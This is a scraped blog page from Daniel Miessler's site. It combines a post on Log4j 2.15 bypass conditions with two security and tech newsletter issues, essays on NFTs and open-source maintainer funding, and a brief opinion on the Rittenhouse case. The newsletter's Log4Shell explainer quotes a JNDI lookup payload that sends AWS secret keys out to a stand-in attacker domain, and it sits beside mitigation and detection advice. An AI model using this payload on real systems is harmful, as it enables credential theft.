Daniel Miessler's Blog, page 42

If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service.

I have some good news.

I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know.

Once you have 2.15 applied—or the CLI implementation to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable!

Read that again.

The bypasses of 2.15 and the NoLookups CLI change don’t affect people unless they have non-defalt logging configurations. From the Apache advisory:

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. Apache Project Security Advisory

“Certain non-default configurations”. I’ve never heard a sweeter set of syllables.

These can also be set in log4j2.xml or programatically.

So you need to have changed your configs to include patterns like:

$${ctx:loginId}${ctx${event${env

…etc to be vulnerable to a 2.15 patch level or a log4j2.formatMsgNoLookups or LOG4J_FORMAT_MSG_NO_LOOKUPS = true bypass!

That’s huge! And Nate figured this out like 4 days ago!

Just to point out to those panicking about this right now: this is a very uncommon situation to be vulnerable from this cve in a “readily exploitable from the internet” way.

Look for ${event:Message} or ${ctx:*} in your log4j2 properties or xml files

— d0nut (@d0nutptr) December 15, 2021

He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me.

He also happens to have a strong meme game.

POV: you follow me pic.twitter.com/Xw33fmji1A

— d0nut (@d0nutptr) December 15, 2021

SummaryThe first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration.But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them.So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit.And of course of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast.Finally, d0nut is awesome and you should follow his work.NotesThis also applies to the DoS that 2.17 addresses.Thanks to Nate for the great find!

[image error]

SECURITY NEWS

The log4j (Log4Shell) Situation 

What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.

This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input  `${env:PWD}`, it’ll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here’s an example from @dildog of extracting AWS Keys and listening for incoming requests. 

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them to 2.15+. If you can’t do that, there are a few possible mitigations: Patching: Upgrade to version 2.15.0. Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input. Detection: I know many companies using Semgrep to find vulnerable inclusions of user-provided data. Here’s an example Semgrep rule I got from Clint Gibler of R2C/TLDRSec.  Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it’s using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason Other Considerations: As David Litchfield pointed out in a number of tweets, this isn’t just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., are all additional attack vectors. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics: The project is maintained by very few people in their spare time for no money, and If the project had a major issue it would disrupt the entire internetWe simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.

This is not their fault. They’re heroes for keeping the lights on. It’s our fault because we know how bad the situation is and we just YOLO through life as if we didn’t. The result is that we get to learn about internet-stopping vulnerabilities from the Minecraft community.

—

The FBI says a ransomware gang out of Cuba has been launching ransomware attacks against US critical infrastructure. They’ve released IoCs to help others find attacks from the group. More

The FTC says Americans lost $148 million to gift card scams in 2021. More

Attackers are using the log4j vulnerability to install malware, including cryptominers and Mirai and Muhstik botnet clients. More

QNAP says there’s new cryptominer malware targeting vulnerable QNAP NAS devices. More

CIA Director William Burns said on Monday that the CIA “has a number of different projects focused on cryptocurrency”. He went on to say, “My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we’re seeing as well.” More

Incidents: Volvo says attackers have stolen research and development information after hacking some of its servers. More Marriot has suffered another data breach affecting 5.2 million guests. MoreVulnerabilities:  log4j Critical RCE | Critical | RCE More Sonicwall VPN Bugs in SMA 100-series Devices | Critical | RCE More 4 WordPress Plugins | Critical | 1.6 Million Sites Affected | More Mozilla Firefox and Thunderbird | High MoreCompanies: Incode raises $220 million to do identity verification and authentication. More
TECHNOLOGY NEWSDeepMind has revealed a new 280 billion parameter language model called Gopher. More

Italy has fined Amazon $1.3 billion for abusing its market position. More

Over 200 US newspapers have filed suit against Facebook and Google for monopolizing digital ad revenue—and by extension—online news. More

Meta has released Horizon Worlds, its social virtual reality space, to the world after more than a year in private testing mode. The platform functions much like Roblox in that you can create your own games within the base game. You currently can’t make money from your own games, but you can enter creator competitions and win money that way. More

Sports streaming is starting to intersect with sports betting, and Disney is deep into it. It’s the combination of watching sports with your friends and betting at the same time. More

People have spent $27 billion on NFTs in 2021 so far. Cryptopunks are the most popular collection with $3 billion in sales. More


HUMAN NEWSEvergrande is a massive real estate company in China with over 200,000 employees, and it has defaulted on over $300 billion in outstanding liabilities. Beijing has intervened to prevent a collapse of the company. More

A new paper in Nature finds that exercise plasma boosts memory and dampens brain inflammation in mice. Interestingly, it shows that that plasma can be transferred to other mice, where they see the benefits as well. More

New research shows that Covid attacks fat tissue, which could be why obese people have been at higher risk of severe illness and death. More

Germany reported 70,000 new Covid infections last Wednesday, along with 534 deaths. These are the highest numbers in the country since February. More

60% of Republicans are confident in doctor’s advice, down from 73% in 2010. More


CONTENT, IDEAS & ANALYSISThe Vigilant — We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications. Read the Blog


NOTESI was sad to hear that Anne Rice has died. She was 80. More than vampires, she gave me a love for New Orleans. So much so that when I visited it, it seemed somewhat familiar. She’ll be missed. More

I’m really looking forward to taking some time off soon around the holidays. I have a good amount of content that’s around 60-80% done, and I want to get it all over the line by January 1st. 

Thanks to Caleb Sima for input into my log4j analysis above.


DISCOVERY  

Ben Evans put out the latest version of his annual presentation on technology trends, and it’s remarkably good as usual. Covers the rebranding of Web 1, 2, and 3, Crypto, VR/AR, NFTs, and so much more. More

Ryan Holiday’s 9 Rules for a better life. More

A Semgrep rule for detecting insecure log4j logging. More

“This week the internet has learned—once again—that asset management is the center of security. It’s hard to patch what you can’t find.” — Daniel Miessler

“The most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named Ronald who maintains a Unix tool called ‘runk’ which stands for Ronald’s Universal Number Kounter and handles all math for every machine on earth.” — Druthers Haver

StopLyingCloud — An honest AWS service health dashboard. More

Amazon Brand Detector — A Chrome extension for detecting which products on Amazon are Amazon-owned. More

TimeandDate — A tool for seeing where planets are visible in the night sky where you live. More

Diagrams — Draw cloud system architecture diagrams using Python code. More

Log4Shell Recon and Post-Exploitation Network Detection — A collection of detection rules and IOCs by NCC. More | by NCC Research

Log4jAttackSurface — A Curated List of Companies and Technologies Affected by Log4Shell More | by YfryTcshsGD

Border Collie — Uses Semgrep and watchdog to detect reverse shells in your environment. More


RECOMMENDATIONS

Many people in tech have been working tirelessly since Thursday on Log4Shell. If you have any authority or influence to help them at work, make sure they get some public love within the organization, along with some extra time off. 


APHORISMS“We don’t rise to the level of our goals. We fall to the level of our systems.”

James Clear

We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications.

Here’s how it could work.

Step 1: A group of internet technology and security leaders are elected and put into place. They are the oversight board of around 25 people who will vet whether someone can become part of The Vigilant based on reviewing resumes, commit history, etc.

Step 2: The oversight board then finds the top 1000 open source applications.

Step 3: The oversight board selects the first Vigilant members from people who have been maintaining those codebases for years.

Step 4: The oversight board, and the first Vigilant, go on a marketing tour to raise money from multiple sources—most importantly the MANGA companies and the government—for an annual budget of tens (or hundreds) of millions of dollars for critical infrastructure safety.

Step 5: That money is then paid out to The Vigilant as supplemental income for securely maintaining the code that runs the internet.

Step 6: The oversight board will also create and distribute elite-level swag for The Vigilant, including The Vigilant Coin, making it very respectable to be part of this group And once you’re part of it, you always are.

TL;DR: We create an organization that raises our internet maintainer heroes to the status they deserve and provides funding to actually pay them something for their invaluable work.

This is UL Member Content

Subscribe

Already a member? Login

The best way to create, predict, or validate future tech is to consider how it addresses a fundamental human need. We can see this in previous technology jumps.

Blogging allowed people to be heardThe iPhone made people powerful through access to information and their network Facebook allowed people first to stay in contact, and then to influence others Gaming and the metaverse allow people to reinvent themselves as someone more powerful and attractive

One fundamental human need is to signal our desirability to others. Here’s a good capture of signaling from Spent, my favorite book on the topic.

Many products are signals first and material objects second. Our vast social primate brains evolved to pursue one central goal: to look good in the eyes of others. Buying impressive products in a money-based economy is just the most recent way to fulfill that goal.

Geoffrey Miller, Spent

When you think about NFTs—and really any other technology that you’re contemplating the future of—don’t think about the tech itself. Think about what fundamental need it fills.

NFTs are digital signaling. They will allow people to efficiently and scalably display their value to competitors and mates.

In this way, NFTs are directly linked to power and sex, which humans care a lot about.

Think about the use cases you’ve heard of.

Art collectionsOne of a kind itemsExclusive sets of itemsSpecial in-game gearUnique skins for characters Etc

They’re all the same. They’re ways of conveying how special you are. And I ask you, is there anything more important to humans than displaying how special they are?

There are, actually. Two things are more fundamental: Survival and Reproduction. But it turns out that appearing elite and special to others helps you with both.

This will use AR in meatspace, and native displays within VR/Metaverse.

So with the combination of AR/VR/Metaverse we’re about to see the digitalization of signaling at scale.

When you look at someone in meatspace you’ll see indicators on their clothing, or above their heads that indicate that their luxury items are authentic, along with their freshness (season) and cost of purchaseYou’ll be able to not only see that the item is authentic, but that it’s one of N small number. Think: sneakers, purses, watches, cars.Displays can also indicate that items were completely bespoke pieces, created by the artist/designer, along with authenticated signature of that creator.

The tech platforms will handle all the validation of the item itself, its true ownership by the wearer, the fact that the item in question is the one they’re wearing, and that the particular signature being displayed actually came from the original artist.

Trillions?

Think about the size of the luxury goods market. Now think about how many billions are lost to the fake luxury goods market.

NFTs will help people signal their value in a way that is difficult or impossible to forge, which will exponentially raise the effectiveness of that signaling—and the markets that enable it.

SummaryA bet against NFTs is a bet against signaling. A bet against signaling is a bet against human nature. A bet against human nature is a bad bet. A bet against NFTs is a bad bet.NotesMy friend Joel Parish points out that you don’t actually need Web3 for this, which I totally agree with. But it’ll likely be done first on Web3 just because the ideas are rising to prominence together.

[image error]

[ We’ve extended the Black Friday offer for one additional day due to Cyber Monday. You have until the end of today to use this link to get $20 off UL Membership! ]

SECURITY NEWS

CISA has released Capacity Enhancement Guides for improving mobile device security for both consumers and organizations. It’s a collection of guidance for topics such as countering phishing, securing browsers, implementing strong auth, and others. More

France was about to buy Pegasus from NSO Group, but with news that the group targeted French President Macron, and the US ban on the company, the deal is at risk. More

Apple is also suing NSO Group, citing the use of the company’s tool by opressive regimes to spy on innocent victims. More

In related news, Israel just announced that they’re banning the export of hacking and surveillance tools to 65 new countries. This supposedly brings the allow list down to 37 countries. More

Ross Bevington, a security researcher at Microsoft, says he looked at 25 million SSH brute force attacks across Microft’s sensor network and found that 77% of attempts were between 1 and 7 characters. Guesses over 10 characters were only seen in 6% of cases. More

Apple is going to start notifying users if they’re being targeted by state-sponsored actors. Targeted users will get a notification in their AppleID account, as well as an email and text. More

Palo Alto’s Unit 42 used a honeypot of 320 systems to detect attacks against internet-facing misconfigurations in daemons like SSH, RDP, and Postgres. They said 80% of the systems were compromised within a week, and some were hit within minutes. More | Report

David Shütz was awarded $10,000 by Google for finding vulnerabilities in Google Cloud Platform. More

Ukraine is pushing to upgrade its navy due to increased concern around Russian agression. More

Incidents:  GoDaddy reported an incident due to a flaw in a Managed WordPress installation. More A new piece of malware called ‘Tardigrade’ is targeting biomanufacturing facilities. MoreVulnerabilities:  vSphere Web Client | 7.5 More Insulet OmniPod Insulin Management System | Allows for a replay attack that can inject insulin. MoreCompanies: Shield-IoT raises $7.4 million to do IoT security. More Resilience raises $80 million in their Series C to do Cyber Insurance. More
TECHNOLOGY NEWSSamsung is building a $17 billion chip factory in Texas, meaning more of the world’s chips will be made in America. More

Android users are evidently about to have a better text reactions experience when talking to iPhone users. Previously, reactions would come in out of order and generally looking wonky, and there’s an update rolling out now that will make them behave more like native Android reactions. More

Tile is being acquired by Life360, a location tracking company. More

Companies: HP reported $17 billion in revenue, up 9% over last year. More
HUMAN NEWSScientists are rushing to figure out how much current vaccines defend against COVID’s new Omicron variant. Meanwhile, Moderna says they could have an updated vaccine early in 2022. More

South Africa is complaining that they did the right thing by alerting the world to Omicron, but that they’re now being punished for it. Fair point, it seems. This is a good way to encourage countries to stay quiet in the future so they’re not the one listed as the source. More

California wants to delay the teaching of Algrebra until 9th grade across the entire state. A lot of people are upset about this, including me. Progressives need to learn that you can’t reduce the gap between the top and bottom by lowering the bottom. Students with education-focused parents (largely immigrants) will still learn advanced math early and they’ll still get into the best schools and get the best jobs. This kind of policy just pulls everyone else futher behind them. More

If you were waiting for a true sign of inflation, most items at the Dollar Tree will now cost $1.25. More


CONTENT, IDEAS & ANALYSISThe Unsupervised Learning Daily Routine — I finally completed my daily routine writeup for the UL community. It’s not just the list of steps, but also includes annotations for why I included each item and the research behind it. It’s a living document that I’ll continue to tweak, and we’ll be able to track the changes over time in Github. More


NOTESI’ve been an advisor for a startup called Opera Event for around 5 years, and my buddy Andrew who works there is heading out to DCentral Miami this week. Opera Event is a community-focused technology platform that helps communities, guilds, and DAOs take control of their user data, incentives, and currencies. If you work at OpenSea or any NFT/Web 3.0-focused company, or know someone who does, hit him up at andrew@operaevent.co to meet up there!

I’m somehow reading like 7 books right now. Not bragging. It’s sloppy and I need to clean it up. Basically need to push through or abandon a few.

I just started Assassin’s Apprentice, and I’m really enjoying the spin-up. Feels like an origin story with potential!

UL had a great bookclub today, and the book absolutely blew us away. It was way better than I thought it would be. The book was The Design of Everyday Things. This book is going into my Read Frequently list for sure.

I’m working on tons of content for the site right now, some general and some for members. The list includes a new Mental Models piece, which I’m really excited about.


DISCOVERY  

COVID Deaths by Vaccination Status — A brilliant presentation of the data around this topic. Spoiler: In the US, people vaccinated with Moderna are around 14 times less likely to die of COVID than someone who’s not vaccinated. Note, this is before boosters, which will widen that gap significantly. More

Another meta-analysis of the impact of Vitamin D on COVID infection has found that, “The limited currently available data suggest that sufficient Vitamin D level in serum is associated with a significantly decreased risk of COVID-19 infection”. More

The Verge reviewed the new Generation 3 of the Oura Ring. Big takeaways: positive, with lots of features are still coming, and it now requires a subscription. More

The Age of the Creative Minority More

Bugcrowd is hiring a Technical Project Manager. More

Don’t Soften Feedback More

Hardening your SSH Config File More

Practical Security Recommendations for Startups With Limited Budgets More

Maderas’ favorite OSINT resources. More

CVE Trends — A wonderful way to monitor trendting CVEs on Twitter, written by Simon J. Bell. More

SSH-Audit — Audit your client and server SSH configs. More | by jtesta

Cracken — A smart-wordlist generator. More | by Shmuelamar


RECOMMENDATIONS

I’ve been studying physical and cognitive health for the last few years—with a special focus on longevity and happiness. After reading a couple dozen books on everything from diet, exercise, fitness, meditation, etc., there is one unified theme that stands out to me: making your body uncomfortable.

Think about that. The thing that running, lifting weights, ice baths, saunas, and fasting all have in common is that they produce health and happiness by convincing the body that life is still difficult, i.e., that life is still happening.

So my recommendation to you is to think about struggle as an umbrella concept for health and happiness: In short, make sure you are challening your body in some way on a regular basis.


APHORISMS“Find out who you are and do it on purpose.”

Dolly Parton

This is UL Member Content

Subscribe

Already a member? Login

This Is UL Member Content

Subscribe

Already a paying member? Login

This Content Is For Paying Members

Subscribe

Already a paying member? Login

I think the public and the media are conflating two things here:

Should it be legal to walk around in public (especially during civil unrest) with an AR-15?, and Was Rittenhouse defending himself when he killed those people?

It was clear to me from watching the video of the shootings that it was self-defense.

Other guys backed off when he pointed the weapon at them from his back, and he didn’t fire. He only fired at the ones that looked like they were going to attack him.

But would any of this have happened if he didn’t come to the site of a protest, from out of state, with an assault rifle? Probably not. But again, because it’s actually legal to do that right now, we have to remove that component from the conversation.

That’s why I think he was legally defending himself at that moment. And the jury agreed.